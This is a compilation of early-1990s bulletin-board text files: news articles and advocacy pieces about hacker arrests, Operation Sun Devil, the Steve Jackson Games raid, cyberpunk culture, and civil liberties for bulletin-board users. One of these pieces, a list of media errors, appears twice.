would obviously not pass constitutional muster under the Fifth
Amendment.  Yet the application of some existing laws to new situations
that arise in the electronic age is only slightly less problematic than
the hypothetical, and the Electronic Frontier Foundation plans to
monitor the process by which old laws are modified, and new laws are
crafted, to meet modern situations.  

One area in which old laws and new technologies have already clashed and
are bound to continue to clash, is the application of federal criminal
laws against the interstate transportation of stolen property.  The
placement on an electronic bulletin board of arguably propriety computer
files, and the "re-publication" of such material by those with access to
the bulletin board, might well expose the sponsor of the bulletin board
as well as all participants to federal felony charges, if the U.S.
Department of Justice can convince the courts to give these federal laws
a broad enough reading.  Similarly, federal laws protecting against
wiretapping and electronic eavesdropping clearly have to be updated to
take into account electronic bulletin board technology, lest those who
utilize such means of communication should be assured of reasonable
privacy from unwanted government surveillance.

Summary

The problem of melding old but still valid concepts of constitutional
rights, with new and rapidly evolving technologies, is perhaps best
summed up by the following observation.  Twenty-five years ago there was
not much question but that the First Amendment prohibited the government
from seizing a newspaper's printing press, or a writer's typewriter, in
order to prevent the publication of protected speech.  Similarly, the
government would not have been allowed to search through, and seize,
one's private papers stored in a filing cabinet, without first
convincing a judge that probable cause existed to believe that evidence
of crime would be found.

Today, a single computer is in reality a printing press, typewriter, and
filing cabinet (and more) all wrapped up in one.  How the use and output
of this device is treated in a nation governed by a Constitution that
protects liberty as well as private property, is a major challenge we
face.  How well we allow this marvelous invention to continue to be
developed by creative minds, while we seek to prohibit or discourage
truly abusive practices, will depend upon the degree of wisdom that
guides our courts, our legislatures, and governmental agencies entrusted
with authority in this area of our national life.

For further information regarding The Bill of Rights please contact:

Harvey Silverglate
Silverglate & Good
89 Broad Street, 14th Floor 
Boston, MA  02110 
617/542-6663 

========================================================================
 
 U.S. Attorney Visits The EPIC Project Online -- July 6, 1990 --
 after EPIC Founder Jeff Aldrich speaks out against government
 raids as a panelist on KPFA-FM "Electronic Democracy" broadcast July 5,
 1990.  The following is an account of that electronic visit.


                           Libertarian Fedz?

   I was interrupted by a "yell for sysop" around noon today.  The user's
name was Joe Dew, from the U.S. Attorney's Office in San Francisco.  Prior to
yelling, he checked the user list for Mike Yamaguchi.

   Mike was in the bbs just after a 4-20-90 half page ad ran in the Wall
Street Journal, "If You Own a Computer You Can Change Congress," asking
those with an interest to login.  He checked things out and appeared to
capture, among other things, the text of a proposed Constitutional Amendment
we distributed electronically in California earlier this year.   Mike
Yamaguchi's login had that "something fishy" strangeness about it.  I found
out why today during a chat with Joe the fed.  I didn't capture -"tape" our
conversation. The following is a careful recap from memory.

  Rather than trying to hide, Joe Dew wanted to chat and did so with candor.

   Joe:  I just heard about EPIC.  Can I see the government files or are they
         private?

 Sysop:  They're in the file section and everything is public.

   Joe:  How do I get there?

 Sysop:  Would you like a tour?

   Joe:  Yes.

 Sysop:  Hang on...

   Off we went for a peek at Information Age Democracy with his capture wide
open for a screen full or two:  OTA Critical Connections summary chapter,
ALA Summary of HR3849, campaign finance disclosure reports on federal, state
and local politicians, county/city meeting agendas, voting records and
approved minutes.  I didn't bother with the user list, he'd already been
there.

 Back to chat...

 Sysop:  Was that enough information?  Or would you like more?

   Joe:  Wow!  That was enough government information, but I didn't get any
         information on EPIC.  Is it a government related agency?  Why are you
         doing this?  Are you a group of hackers?  Where do I get
         information on EPIC?

 Sysop:  "A bunch of hackers?"  Hardly.  EPIC is a nonprofit public benefit
         corporation; a citizen operated and supported electronic publisher
         providing free public access to government documents and
         information.  Board members include legal eagles, constitutional
         scholars and activists.  I appreciate your interest.  You know who I
         am, may I ask who you are?  Media or fedz?

   Joe:  Strange that you ask.  I'm with the government.

 Sysop:  As in fedz?

   Joe:  Well, both actually.  I'm with the U.S. Attorney's Office, but I'm
         leaving in a month to work with a media marketing company.  I'm
         new to this and meant no offense asking about hackers.

 Sysop:  None taken.  It's just that many of us are concerned about "thought
         police" because of recent events.  Not that we have anything to
         hide, but the current climate is, well...tense.

   Joe:  I haven't been out of college long...and going to work here changed
         my mind about fedz.  They're some of the most libertarian people
         I've met.  I understand your uneasiness, but there's no need to be
         concerned.  Our office concentrates on drug dealers.

 Sysop:  Don't be a stranger, you're welcome here.  And tell Yama...(whatever)
         he's welcome too.  Thanks for your candor.

   Joe:  He's out to lunch right now.  But I'll tell him, his office is just
         down the hall.

 Sysop:  I'll put some of the information you asked for in the public file
         section so you'll be able to grab it at your leisure.

   Joe:  Thanks, I gott'a go.

 Sysop:  bb

   I took him back to the opening menu for an easy exit.  Joe the fed seemed
like a nice guy, a regular person.  The fact he didn't fit my picture of
"thought police" ran through my mind.  As if I had a Polaroid tucked away in
a dusty album or had seen'em in the "T" volume encyclopedia sitting on the
shelf.  His effort to reasure me I had no reason for concern did little to
ease the Orwellian tension of his visit.

   I considered asking Joe the fed why he thought EPIC might be a group of
hackers.  My social conditioning would give little merit to his answer, so
it wasn't worth asking.  I wondered if he was reading the hackers conference
on the Well or heard me on the radio yesterday.  As disappointing as it might
be, the local high school kids fix our computer when it decides to act up.
The only hack I'm guilty of is the mess I made in my home directory trying to
automate my conferencing on the Well.

   Joe the fed made my day.  For a moment he elevated me to genuine computer
literacy.  He logged off and it was back to the reality of fumbling with a
label program to get the mail out before five.

============================END OF FILE=======================================


[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[                                     ]
[      The Great Satellite Caper      ]
[                                     ]
[              Typed by:              ]
[            Silent Rebel             ]
[                 *                   ]
[           ( 40 columns )            ]
[				      ]
[	Uploaded by Elric of Imrryr   ]
[         Lunatic Labs News Dept      ]
[				      ]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 
Taken from: Time magazine
            July 29, 1985
 
       The Great Satellite Caper
Hackers' arrests point up the growing
    problem of system security
               ----
  It started innocuously enough: a 
credit card customer in Connecticut 
opened his monthly statement and 
noticed a charge for a piece of 
electronic equipment that he had never
purchased. By last week that apparent
billing error had blossomed into a
full-fledged hacker scandal and led to
the arrest of seven New Jersey
teenagers who were charged with 
conspiracy and using their home 
computers and telephone hookups to
commit computer theft.
  According to police, who confiscated
$30,000 worth of computer equipment
and hundreds of floppy disks, the
youths had exchanged stolen credit card
numbers, bypassed long-distance 
telephone fees, traded supposedly 
secret phone numbers (including those 
of top Pentagon officials) and 
published instructions on how to 
construct a letter bomb. But most 
remarkable of all, the first reports
said, the youngsters had even managed
to shift the orbit of one or more
communication satellites. That feat,
the New York Post decided, was worth
a front-page headline: WHIZ KIDS ZAP
U.S. SATELLITES.
  It was the latest version of the hit
movie WarGames, in which an ingenious
teenager penetrates a sensitive 
military computer system and nearly 
sets of World War III. Two years ago, 
for instance, the story was re-enacted
by the so-called 414 Gang, a group
of Milwaukee-area youths who used
their machines to break into dozens
of computers across the U.S.
  The New Jersey episode assumed heroic
proportions when Middlesex County
Prosecutor Alan Rockoff reported that
the youths, in addition to carrying
on other mischief, had been "changing
the position of satellites up in the
blue heavens." That achievement, if
true, could have disrupted telephone 
and telex communications on two 
continents. Officials from AT&T and
Comsat hastily denied that anything of
the sort had taken place. In fact, the
computers that control the movement
of their satellites cannot be reached
by public telephone lines. By weeks
end the prosecutor's office was quietly
backing away from its most startling
assertion, but to most Americans, the
satellite caper remained real, a 
dramatic reminder that for a bright
youngster steeped in the secret arts
of the computer age, anything is
possible. Says Steven Levy, author
of Hackers: "It's an immensely 
seductive myth, that a kid with a 
little computer can bring a powerful
institution to its knees."
  Last spring postal authorities traced
the Connecticut credit card purchase 
and a string of other fraudulent
transactions to a post-office box in
South Plainfield, N.J. Someone was
using the box to take delivery of 
stereo and radar-detection
equipment ordered through a 
computerized mail-order catalog. The
trail led to a young New Jersey 
enthusiast who used the alias "New
Jersey Hack Sack" and communicated 
regularly with other computer owners
over a loosely organized network of
electronic bulletin boards. A computer
search of the contents of those boards
by Detective George Green and Patroman
Michael Grennier, who is something of
a hacker himself, yielded a flood of
gossip,advice,tall tales, and hard
information including excerpts from an
AT&T satellite manual, dozens of secret
telephone numbers and lists of stolen
credit card numbers.
  The odd mix was not unique to the 
suspect bulletin boards. Explains Donn
Parker, a computer crime expert at
SRI International in Menlo Park,Calif.:
"Hacking is a meritocracy. You rise in
the culture depending on the 
information you can supply to other
hackers. It's like trading bubble gum
cards."
  Some of the information posted
by the New Jersey hackers may have been
gleaned by cracking supposedly secure
systems. Other data, like the access
numbers of remote computers, were 
probably gathered automatically by 
so-called demon dialers, programs that
search the phone system for on-line
computers by dialing, in sequence, 
every phone number within an area code.
"In some cases it takes a great deal
of skill and knowledge," says Parker.
"In others it's as simple as dialing
into a bulletin board and finding the
passwords that other kids have left."
And sometimes it is even simpler than
that. Two of the New Jersey youths
admitted that at least one of the 
credit card numbers they used had come
not from a computer but from a slip
of carbon paper retrieved from a trash
can.
  No matter how mudane, the actions of
the New Jersey hackers have again
focused national attention on a real
and growing problem: how to safeguard
the information that is stored inside
computers. Americans now carry more 
more than 600 million credit cards, 
many of them allowing at least partial
access to a computerized banking system
that moves more than $400 billion every
day. Corporate data banks hold consumer
records and business plans worth untold
billions more.
  Alerted to the threat by earlier
break-ins, corporations and government
agencies have been moving to shore up
their systems. Many have issued
multiple layers of password protection,
imposing strict discipline on the 
secrecy of passwords and requiring 
users to change theirs frequently. 
Others have installed scrambling 
devices that encode sensitive data 
before they are sent,over the wires. 
Audit trails make crime detection
easier by keeping a permanent record of
who did what within a system. Dial-back
services help keep out unauthorized 
users by recording each caller's ID 
number, disconnecting the call and then
redialing only that telephone number
authorized by the holder of the ID.
  All told, U.S. business spent 
$600 million last year on security 
equipment and software. By 1993,
according to Datapro Research, security
expenditures could exceed $2 billion
annually. In addition to the cost,these
measures tend to make the systems 
harder to use, or less "friendly," in
the jargon of the trade. But computer
operators who like to keep their
systems casual may be courting trouble.
Says SRI's Parker: "These are 
reasonable, cost-effective steps that
managers who don't use them pretty much
deserve what they get."
 
                -By Phillip Elmer-DeWitt
Reported by Marcia GaugerNNew York and 
Stephen KoeppLLos Angeles
 
                                                                       
Downloaded from Just Say Yes. 2 lines, More than 500 files online!
         Full access on first call. 415-922-2008 CASFA 

 
 
 
  Another file downloaded from:   
 
         !
        -$-             & the Temple of the Screaming Electron
         !    *                    Walnut Creek, CA
   +    /^   |
   !    | |//^  _^_     2400/1200/300 baud  (415) 935-5845  
  /^  /   @ |  /_-_            Jeff Hunter, Sysop
  |@ _| @     @|- - -|                                     
  |  | |    /^ |  _  |                  - - - - - - - - - * 
  |___/____|_|_|_(_)_|       Aaaaaeeeeeeeeeeeeeeeeee!   /   
 
       Specializing in conversations, E-Mail, obscure information,
   entertainment, the arts, politics, futurism, thoughtful discussion, 
          insane speculation, and wild rumours. An ALL-TEXT BBS.
 
                         "Raw data for raw minds." 
 
By Philip Elmer-Dewitt 
Time, February 8, 1993
 
In the 1950s it was the beatniks, staging a coffeehouse rebellion 
against the 'Leave it to Beaver' conformity of the Eisenhower era.  
In the 1960s the hippies arrived, combining antiwar activism with 
the energy of sex, drugs and rock 'n' roll.  Now a new subculture is 
bubbling up from the underground, popping out of computer 
screens like a piece of futuristic HYPERTEXT (see indentation).
 
		Hypertext - In this article, words printed in color [not 
here] are defined or expanded upon in marginal entries coded to 
the same color.  In a computer hypertext article, electronic 
footnotes like these actually pop up on the screen whenever you 
point your cursor at a "hot" word and click the button of your 
mouse.
 
They call it cyberpunk, a late-20th century term pieced together 
from CYBERNETICS (the science of communication and control 
theory) and PUNK (an antisocial rebel or hoodlum). [Well I guess 
we can stop the debatre on alt.cyberpunk now =) ] Within this odd 
pairing lurks the essence of cyberpunk culture.  It's a way of 
looking at the world that combines an infatuation with high-teck 
tools and a disdain for conventional ways of  using them.  
Originally applied tooa school of hard-boiled science-fiction 
writiers and then to certain semitough computer hackers, the word 
cyberpunk now covers a broad range of music, art, psychedelics, 
smart drugs and cutting-edge technology. The cult is new enough 
that fresh offshoots are sprouting every day, which infutiated the 
hardcore cyberpunks, who feel they got there first.
	
		Cybernetics -- Norbert Wiener of MIT was designing 
systems for World War II antiaircraft guns when he realized that hte 
critical component in a control system, whether animal or 
mechanical, is a feedback loop that gives a controller information 
on the results of its actions.  He called the study of these control 
systems cybernetics (from Kybernetes, the Greek word for 
Helmsman [Anybody want to deconstruct this one]) and helped 
pave the way for electronic brains that we call computers.
 
		Punk -- Cyberculture borrows heavily from the 
rebellious attitude of punk music, sharing with such groups as the 
Sex Pistols a defiance of mainstream culture and an urge to turn 
modern technology against itself.
 
Stewart Brand, editor of the hippe-era 'Whole Earth Catalog,' 
describes cyberpunk as "technology with attitude."  Science-fiction 
writier Bruce Sterling calls it "an unholy alliance of the technical 
world with the underground of pop culture and street level 
anarchy."  Jude Milhon, a cyberpunk journalist who writes under 
the byline of St. Jude, defines it as "the place where the worlds of 
science and art overlap, the intersection of the futureand now."  
What cyberpunk is about, says Rudy Rucker, a San Jose State 
University mathematician who writes science-fiction books on the 
side, is nothing less than "the fusion of humans and machines."
 
As in any counterculture movement, some denizens would deny 
that they are part of a "movement" at all. Certainly they are not as 
visible from a passing car as beatniks or hippies once were.  
Ponytails (on men) and tattoos (on women) do not a cyberpunk 
make -- though dressing all in black and donning mirrored sun-
glasses will go a long way.  ANd although the biggest cyberpunk 
journal claims a readersh approaching 70,000, there are probably 
no more than a few thousand computer hackers, futurists, fringe 
scientists, computer savvy artists and musicians, and assorted 
science-fiction geeks [hmmm where do I fit in] around the world 
who actually call themselves cyberpunk.
 
Nevertheless, cyberpunk may be the defining counterculture of the 
compute age.  It embraces, inspirit at least, not just the nearest 
thirtysomething hacker hunched over his [sic] terminal but also 
nose-ringed twentysomethings [wait - was that an insult???] 
gathered at clandestine RAVES, teenagers who feel about the 
Macintosh computer the way their parents felt about Apple 
Records, and even preadolescent vidkids fused like Krazy Glue to 
their Super NIntendo and Sega Genesis games -- they training 
wheels of cyberpunk [Look Ma! no hands.].  Obsessed with 
technology, especially technology that is just beyond their reach 
(like BRAIN IMPLANTS), the cyberpunks are future oriented to a 
fault.  They already have one foot in the 21st century, and time is 
on their side.  In the long run, we will all be cyberpunks.  [ugh - 
Goddess Save Us All ]
 
		RAVES -- organized on the fly (sometimes by 
electronic mail) and often held in warehouses, raves are huge, 
nomadic dance parties that tend to last all night, or until the police 
show up.  Psychedelic mood enhancers and funny accessories 
(white cotton gloves, face masks) are optionals. [what, no 
ubiquitous Cat-in-the-Hat has?]
 
		BRAIN IMPLANTS -- Slip a microchip into snug 
contact with your gray matter (a.k.a. wetware) and suddenly gain 
instant fluency in a foreign language or arcane subject.
 
The cyberpunk look -- a kind of SF surrealism tweaked by coputer 
graphics -- is already finding its way into galleries, music videos 
and Hollywood movies.  Cyberpunk magazines, many of which 
are "zines," cheaply published by desktop computer and 
distributed by electronis mail, are multiplying like cable-TV 
channels.  The newest, a glossy, big-budget [where'd all the 
money go to?] entry called "WIRED," premiered last week with 
Bruce Sterling on the cover and ads from the likes of Applie 
Computer and AT&T [Boo... Hisss...].  Cyberpunk music, including 
ACID HOUSE and INDUSTRIAL, is popular enough to keep 
several record companies and scores of bands cranking out CDs.  
Cyberpunk-oriented books are snapped up by eager fans as soon 
as they hit the stores. (Sterling's latest, "The Hacker Crackdown," 
quickly sold out its first hard-cover printing of 30,000.) A piece of 
cyberpunk performance art, Tubes, starring Blue Man Group, is a 
hit off-broadway. And cyberpunk films such as "Blade Runner," 
Videodromve, Robocop, Total REcall, Terminator 2, and The 
Lawnmower Man have moved out of the cult market and into the 
mall.  
 
		Acid House -- White-hot danced music that falls 
somewhere between disco and hip-hop.
 
		INDUSTRIAL -- Mixing rhythmic machine clanks, 
electornic feedback and random radio noise, industrial music is 
"the sounds our culture makes as it comes unglued," says 
cyberpunk writer Gareth Branwyn.
 
Cyberpunk culture is likely to get a boost from, of all things, the 
Clinton-Gore Administration, because of a shared interest in what 
the new regime calls America's "data highways" and what the 
cyberpunks call CYBERSPACE.  Both terms describe the globe-
circling, interconnected telephone network that is the conduit for 
billions of voice, fax, and computer-to-computer 
commmunications.  The incoming Administration is focused on the 
wiring, and it has made strenghtening the networks high-speed 
data liks a priority.  The cyberpunks look at those wires from the 
inside; they talk of the network as if it were an actual place -- a 
VIRTUAL REALITY that can be entered, explored and 
manipluated.
 
			CYBERSPACE -- SF writier William Gibson 
called it "a consensual hallucination ... a graphic representation of 
data abstracted from the banks of every cojputer in the human 
system."  You can get there simply by picking up the phone.
 
		VIRTUAL REALITY -- An interactive technology that 
creates an illusion, still crude rather than convincing, of being 
immersed in an artificial world.  The user generally dons a 
computerized glove and a head-mounted display equipped with a 
TV screen for each eye.  Now available as an arcade game.
 
Cyberspace plays a central role in the cyberpunk world view.  The 
literature is filled with "console cowboys" who prove their mettle by 
donning virtual reality headgear and performing heroic feats in the 
imaginary "matrix of cyberspace.  Many of the punks' real-life 
heroes are also computer cowboys of one sort or another.  
"Cyberpunk", a 1991 book by two New York TIMES reporters, 
John Markoff and Katie Hafner, features profiles of three canonical 
cyberpunk hackers, including Robert Morris, the Cornell graduate 
student whose computer virus brought the huge network called the 
internet to a halt.  
THE TOP TEN MEDIA ERRORS ABOUT THE SJ GAMES RAID      updated 2-12-92
 
As this story has developed, occasional errors creep into news stories--
and many of them have taken on a life of their own. Some reporters, working
from their clipping files, have turned out stories that are almost 100%
free of facts. There are a lot of those floating around . . .  but here are
our Top Ten.
 
10. Steve Jackson Games is a computer game company.
    No we're not. None of our games are computer games. We use computers
to WRITE the games, like every other publisher in the '90s. And the
game that was seized, GURPS CYBERPUNK, was about computers. But we're
not a computer game company any more than George Bush is a gardener.
 
9. GURPS Cyberpunk is a computer game.
    No it's not. Aieeeeee! It's a roleplaying game. It is not played
on a computer. It's played on a table, with dice.
 
8. We're out of business.
    No we're not. It's been reported that we are bankrupt, or filing for
bankruptcy. It was very close, and we're not out of the woods by any
means - we did have to lay off half our staff after the raid 
. . . but we're not dead yet.
 
7. We were raided by the FBI.
    No we weren't. We were raided by the US Secret Service. The FBI had
nothing to do with it. (In fact, when Bill Cook, the assistant US
attorney named in our suit, was doing his "research," he talked to the
FBI. They told him he didn't have a case. We have this from FBI sources!)
 
6. Some of our staff members were arrested by the Secret Service and
charged with hacking.
    No they weren't. No member of our staff was arrested, indicted, or
charged. Nobody was even QUESTIONED after the day of the raid.
 
5. This was part of Operation Sun Devil.
    No it wasn't. Sun Devil was a totally separate project, aimed at
credit card fraud. Because it had a neat name, it got a lot of headlines.
Since computers were involved, some reporters got the two confused. The
Secret Service helped the confusion along by refusing to comment on what
was, or wasn't part of Sun Devil. Sun Devil was not a "hacker"
investigation. So says Gail Thackeray, who was its spearhead.
 
4. The raid was after GURPS Cyberpunk.
    No it wasn't. The Secret Service suspected one of our staffers of
wrongdoing, using his computer at home. They had nothing connecting his
alleged misdeeds with our office, but they raided us anyway, and took a
lot of things. One of the things they took was the GURPS Cyberpunk
manuscript. Their agents were very critical of it, and on March 2 in
their office, one of them called it a "handbook for computer crime."
Since their warrant was sealed, and they wouldn't comment, our best guess
was that they were trying to suppress the book. They did suppress it, but
apparently it was through bureaucratic inertia and stonewalling rather
than because it was a target of the raid. Unfortunately, they let us
believe for 7 months (until their warrant affidavit was unsealed)
that they had been after the book.
 
3. There was a hacker threat to sabotage the 911 system.
    No there wasn't. This story has been cynically spread by phone company
employees (who know better) and by Secret Service spokesmen (who probably
believe it, because they still don't understand any of this). They're
using this story to panic the media, to try to justify the illegal things
they've done and the huge amount of money they've spent.
    What happened was this: A student got access to a phone company
computer and copied a text file - not a program. This file was nothing
but administrative information, and was publicly available elsewhere.
Bell South tried to value it at $79,000, but in court they admitted that
they sold copies for under $20. There was no way this file could be used
to hurt the 911 system, even if anybody had wanted to. To say otherwise
shows an incredible ignorance of the facts. It's as though a banker
claimed "This criminal made an illegal copy of the list of our Board of
Directors. He can use that to break into our vault."
 
2. GURPS Cyberpunk was written by Lloyd Blankenship.
    He spells his name Loyd, with one L.
 
And the Number One "false fact" ever reported about this story . . . 

1. Steve Jackson Games is the second largest game company in the USA.
    Don't we wish!
THE TOP TEN MEDIA ERRORS ABOUT THE SJ GAMES RAID      updated 2-12-92
 
As this story has developed, occasional errors creep into news stories--
and many of them have taken on a life of their own. Some reporters, working
from their clipping files, have turned out stories that are almost 100%
free of facts. There are a lot of those floating around . . .  but here are
our Top Ten.
 
10. Steve Jackson Games is a computer game company.
    No we're not. None of our games are computer games. We use computers
to WRITE the games, like every other publisher in the '90s. And the
game that was seized, GURPS CYBERPUNK, was about computers. But we're
not a computer game company any more than George Bush is a gardener.
 
9. GURPS Cyberpunk is a computer game.
    No it's not. Aieeeeee! It's a roleplaying game. It is not played
on a computer. It's played on a table, with dice.
 
8. We're out of business.
    No we're not. It's been reported that we are bankrupt, or filing for
bankruptcy. It was very close, and we're not out of the woods by any
means - we did have to lay off half our staff after the raid 
. . . but we're not dead yet.
 
7. We were raided by the FBI.
    No we weren't. We were raided by the US Secret Service. The FBI had
nothing to do with it. (In fact, when Bill Cook, the assistant US
attorney named in our suit, was doing his "research," he talked to the
FBI. They told him he didn't have a case. We have this from FBI sources!)
 
6. Some of our staff members were arrested by the Secret Service and
charged with hacking.
    No they weren't. No member of our staff was arrested, indicted, or
charged. Nobody was even QUESTIONED after the day of the raid.
 
5. This was part of Operation Sun Devil.
    No it wasn't. Sun Devil was a totally separate project, aimed at
credit card fraud. Because it had a neat name, it got a lot of headlines.
Since computers were involved, some reporters got the two confused. The
Secret Service helped the confusion along by refusing to comment on what
was, or wasn't part of Sun Devil. Sun Devil was not a "hacker"
investigation. So says Gail Thackeray, who was its spearhead.
 
4. The raid was after GURPS Cyberpunk.
    No it wasn't. The Secret Service suspected one of our staffers of
wrongdoing, using his computer at home. They had nothing connecting his
alleged misdeeds with our office, but they raided us anyway, and took a
lot of things. One of the things they took was the GURPS Cyberpunk
manuscript. Their agents were very critical of it, and on March 2 in
their office, one of them called it a "handbook for computer crime."
Since their warrant was sealed, and they wouldn't comment, our best guess
was that they were trying to suppress the book. They did suppress it, but
apparently it was through bureaucratic inertia and stonewalling rather
than because it was a target of the raid. Unfortunately, they let us
believe for 7 months (until their warrant affidavit was unsealed)
that they had been after the book.
 
3. There was a hacker threat to sabotage the 911 system.
    No there wasn't. This story has been cynically spread by phone company
employees (who know better) and by Secret Service spokesmen (who probably
believe it, because they still don't understand any of this). They're
using this story to panic the media, to try to justify the illegal things
they've done and the huge amount of money they've spent.
    What happened was this: A student got access to a phone company
computer and copied a text file - not a program. This file was nothing
but administrative information, and was publicly available elsewhere.
Bell South tried to value it at $79,000, but in court they admitted that
they sold copies for under $20. There was no way this file could be used
to hurt the 911 system, even if anybody had wanted to. To say otherwise
shows an incredible ignorance of the facts. It's as though a banker
claimed "This criminal made an illegal copy of the list of our Board of
Directors. He can use that to break into our vault."
 
2. GURPS Cyberpunk was written by Lloyd Blankenship.
    He spells his name Loyd, with one L.
 
And the Number One "false fact" ever reported about this story . . . 

1. Steve Jackson Games is the second largest game company in the USA.
    Don't we wish!
Article from the Sunday Chicago Tribune, November 18, 1990

CRACKDOWN ON CRIME IS RAISING QUESTION OF COMPUTER RIGHTS

by Jim Sulski


     At dawn on a spring morning, several Secret Service agents, armed with
guns and a warrant, converged on a Northwest Side home and storefront.
     When they left, they had seized - not drugs or firearms - but computer
equipment, including several personal computers, modems, printers, and floppy
disks.
     Across the country, several similar raids were taking place as part of the
federal government's recent crackdown on computer crimes.
     The targets were not sophisticated, high-powered computers or foreign
technology.  The government, instead, was aiming and computer bulletin boards,
which are interactive computer systems that can be run on PCs/
     Through the bulletin boards, agents were targeting people known as
"hackers."  They use the boards for illegal purposes such as swapping stolen
credit card or long distance numbers; posting instructional information, such
as passwords for breaking into other computer systems; or distributing stolen
software or electronic information.
     In the last year or so, the government has stepped up action against
hackers and their so-called "underground" activities, government officials
said.
     The definition of "underground" differs depending on whom you talk to. 
The government considers  it a network of computer users who engage in illegal
activities.  Computer industry experts, on the other hand, computer the
underground to so-called underground theater and newspapers, defining
participants as enthusiasts who like to explore new areas.
     A two-year government investigation, called Operation Sun Devil,
culminated in March with the seizure of several bulletin boards and indictments
against some of their operators.
     Sun Devil agents executed 27 search warrants across the country,
government officials said.  Part of the investigation was spearheaded by
Chicago-based federal agents.
     But members of the computer industry and civil liberties experts have
vehemently opposed the government's actions, saying that the governent has
overreacted.  They also claim that the government isn't educated to the world
of bulletin boards and the computer underground.
     More importantly, they say, the government's actions infringe on 1st
Amendment rights, and that freedom of the press and the right to publish has
been granted to paper publications but not to electronic publications.
     "The danger is that it threatens freedom of speech because it means the
bullatin board operators or users have to be very careful what they post on a
board," says Jim Thomas, a professor of sociology/criminal justice at Northern
Illinois University, DeKalb, and a moderator of the Computer Underground
Digest.
     The digest is an electronic journal that was begin in March to serve as a
vehicle for debate on issues related to the computer underground.
     "There's a double standard here about what you can say in print or in
public and what you can do on a bulletin board," Thomas said.  "If I send you a
note through the U.S. mail, it's privileged.  People can't just walk into the
post office and confiscate all the letters because I have sent you a letter.
     "Yet if I send you a letter on E-mail [the federal government's] actions
indicate they can go in and close down a bulletin board and take all the
private mail out and read it." 
     In addition, such action could discourage legitimate activities of law-
abiding computer users, computer experts said.
     "It has a chilling effect on speech as far as what people can say to each
other, publicly or privately," Thomas said.  "It makes people paranoid out
there."
     U.S. Atty. William J. Cook maintained, however, that the government
actually has a very favorable attitude toward bulletin boards.
     "The federal government is not involved in an investigation of bulletin
board operations," he said.  "As a matter of fact, the federal government
operates more bulletin boards than any other single institution in the world,
both inside various agencies and public service boards.  So we'd be shooting
ourselves in the foot if we took a broad sweep at bulletin boards."
     Instead, Cook said, they government is cracking down on the electronic
vehicles hackers use to traffic and hide stolen information.  These happen to
be primarily bulletin boards.
     "For years, hackers hid stolen information on their home computers," he
said.  "But now they've become more sophisticated and more clandestine in their
operations.  They have taken to hiding information in other locations, such as
bulletin boards, university computers and other facitilies where they're able
to create accounts.  We've even seen hackers hide stolen information on the
system they stole it from by taking it from one file location to another."
     Equipment seizures are often the only way to track down stolen computer
information, Cook added.
     While acknowledging that some members of the so-called computer
underground can be dangerous, computer rights supporters claim that most are
curious but harmless.  Most of those who break into computer systems do it for
the challenge and not to cause damage, they said.
     "Generally, I think most of these kids were raised on getting to the next
level on the Nintendo game and this is just a logical progression of that,"
said attorney Sheldon T. Zenner of the Chicago firm, Katten, Muchin and Zavis.
     "They are trying to see what's behind the locked doors," Zenner added. 
"That doesn't make it right.  But the question is how do you deal with those
wrongs if there is no harm and no malicious intent?"
     He said he is concerned that punishment be appropriate to the crime.
     Zenner was involved in one recent case that he considers a possible
milestone in the rights of bulletin board operators and users.
     He represented University of Missouri student Craig Niedorf, 20, who
published an electronic computer underground magazine titled Phrack.  The
magazine documented stories about hackers' adventures breaking into computer
systems.
     Niedorf was indicted earlier this year on federal charges of wire fraid
and interstate transportation of stolen property.  His computer equipment was
seized and, if convicted, he faced up to 31 years in prison and a fine of
$122,000.
     The government charged that Niedorf published a BellSouth Co. document
about their 911 emergency phone service system.  Niedorf allegedly distributed
copies of Phrack through computer bulletin boards.
     Niedorf was accused of acquiring the information through a Lockport, Ill,
bulletin board.  The information had been entered by one of three Georgia men
who stole it from the BellSouth computer system.  The three men admitted taking
the information from the BellSouth system and pleaded guilty to computer fraid
in June.
     Niedorf wasn't charged with hacking; instead the government centered on
his role as a bulletin board operator.  However, four days into his trial in
Chicago in late July, the government dropped all charges after learning that
much of the information in the document already was available to the public,
Cook said.
     As a result of the case, Zenner said he believes the government will be
"more careful" in charging bulletin board operators with computer crimes.
     "In their haste to catch the computer criminals, [the government] also
netted some innocent people," Zenner said.  "But they weren't able to figure
that out until after innocent people had been indicted and had to bear the
expense and time of taking it to trial.  And that's the problem of an area
that's maybe not fully understood by law enforcement."
     The computer rights supporters noted the following other cases in which
they claim the government overreacted:
     In May, Chicagoan Bruce Esquibel, 31, was awakened in his Albany Park home
by federal agents who had a seizure warrant for the computer equipment that ran
his bulletin board.
     Esquibel, who works in the electronics repair business, operated the Ripco
bulletin board sine December 1983, which, he said, catered to about 600 users. 
Its subjects included poetry, tips for computer games, and underground computer
newsletters.
     The warrants didn't require the government to explain to Esquibel why they
were seizing his equipment, he said.  "So I have no clue to what specific type
of material from the bulletin board they were concerned about," he said.
     Esquibel hasn't been charged with any crime.
     Esquibel and Zenner, his attorney, however, can only speculate on why the
government was interested in his bulletin board.
     "The theory I have is that someone on my system may have been passing
[though E-mail] credit cards or long distance access codes or some type of
information that would be blatantly illegal," Esquibel said. "Personally, I
have no interest in this whole hacking thing.  And the majority of people on my
board were also never interested in that material."
     Like other bulletin board operators, Esquibel said he routinely checked
for information that may have seemed criminal in nature.  But even with regular
maintenance, such information could remain on the board for a day.
     In Texas earlier this year, the Secret Service raided the offices of
computer games producer Steve Jackson and confiscated some of his equipment. 
Again, the warrants kept the nature of the seizure secret, computer experts
said.  Computer rights supporters believe the government thought Jackson was
producing a manual for computer crime.  Jackson said he was creating a role-
playing game about computer espionage called Gurps Cyberpunk.
     Jackson also wasn't charged with any crime, and his computer equipment was
returned to him.
     Computer industry and civil liberties experts have begun to resist the
government's actions.
     Partially because of the Niedorf indictment, several computer executives
in July formed the Electronic Frontier Foundation to lobby for 1st Amendment
protections for computer bulletin boards and newsletters and to stop what they
consider intrusive law-enforcement techniques.
     Founders of the organization include Mitchell Kapor, creatore of software
manfucaturer Lotus Development Corp., and Steven Wozniak, co-founder of Apple
Computer Inc.
    The establishment by NIU's Thomas and sevel others of the Computer
Underground Digest was a more grass-roots movement.  "I became angry at the
hyperbole," Thomas said.  "I was attracted to this by the sense of injustice. 
Then the rights issues began to emerge."
     Zenner said those groups are bringing attention to the question of rights
for bulletin board operators and users. "But the courts have not really
addressed that issue," he said.  "And that has made bulletin board operators
very nervous."
     Computer rights supporters believe that policies on seach and seizure and
